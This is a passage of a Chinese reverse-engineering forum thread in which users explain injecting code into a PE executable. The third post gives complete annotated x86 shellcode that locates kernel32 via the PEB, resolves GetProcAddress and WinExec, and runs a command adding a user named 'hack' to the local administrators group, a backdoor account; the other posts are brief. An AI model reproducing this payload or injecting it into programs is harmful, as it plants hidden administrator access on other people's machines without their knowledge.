能力值:
( LV2,RANK:10 )
|
-
-
2 楼
首先要创建区段`再写入代码``修改PE结构吧
如果汇编修改的```直接插入代码
|
能力值:
( LV13,RANK:410 )
|
-
-
3 楼
60 pushad
55 push ebp
83EC 40 sub esp, 40
8BEC mov ebp, esp
55 push ebp
64:A1 30000000 mov eax, dword ptr fs:[30]
8B40 0C mov eax, dword ptr [eax+C]
8B70 1C mov esi, dword ptr [eax+1C]
AD lods dword ptr [esi]
8B78 08 mov edi, dword ptr [eax+8]
8B47 3C mov eax, dword ptr [edi+3C]
8B5407 78 mov edx, dword ptr [edi+eax+78]
03D7 add edx, edi
8B4A 18 mov ecx, dword ptr [edx+18]
8B5A 20 mov ebx, dword ptr [edx+20]
03DF add ebx, edi
@@:
49 dec ecx
8B348B mov esi, dword ptr [ebx+ecx*4]
03F7 add esi, edi
B8 47657450 mov eax, 50746547 ; GetP
3906 cmp dword ptr [esi], eax
75 F1 jnz @B
B8 726F6341 mov eax, 41636F72 ; rocA
3946 04 cmp dword ptr [esi+4], eax
75 E7 jnz @B
8B5A 24 mov ebx, dword ptr [edx+24]
03DF add ebx, edi
66:8B0C4B mov cx, word ptr [ebx+ecx*2]
8B5A 1C mov ebx, dword ptr [edx+1C]
03DF add ebx, edi
8B048B mov eax, dword ptr [ebx+ecx*4]
03C7 add eax, edi
8945 40 mov dword ptr [ebp+40], eax
68 78656300 push 636578 ; xec
68 57696E45 push 456E6957 ; WinE
54 push esp ; WinExec
57 push edi
FF55 40 call dword ptr [ebp+40] ; GetProcAddress
8945 08 mov dword ptr [ebp+8], eax
6A 00 push 0
68 64640000 push 6464 ; dd
68 6B202F61 push 612F206B ; k /a
68 20686163 push 63616820 ; hac
68 746F7273 push 73726F74 ; tors
68 73747261 push 61727473 ; stra
68 6D696E69 push 696E696D ; mini
68 70206164 push 64612070 ; p ad
68 67726F75 push 756F7267 ; grou
68 6F63616C push 6C61636F ; ocal
68 6574206C push 6C207465 ; et l
68 6464266E push 6E266464 ; dd&n
68 6B202F61 push 612F206B ; k /a
68 20667563 push 63756620 ; fuc
68 6861636B push 6B636168 ; hack
68 73657220 push 20726573 ; ser
68 65742075 push 75207465 ; et u
68 2F63206E push 6E20632F ; /c n
68 436D6420 push 20646D43 ; Cmd
54 push esp
; Cmd /c ner user hack fuck /add&net localgroup administrators hack /add
FF55 08 call dword ptr [ebp+8] ; WinExec
61 popad
这样应该会容易理解一些。
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
哈哈 谢谢楼上....
知道了
|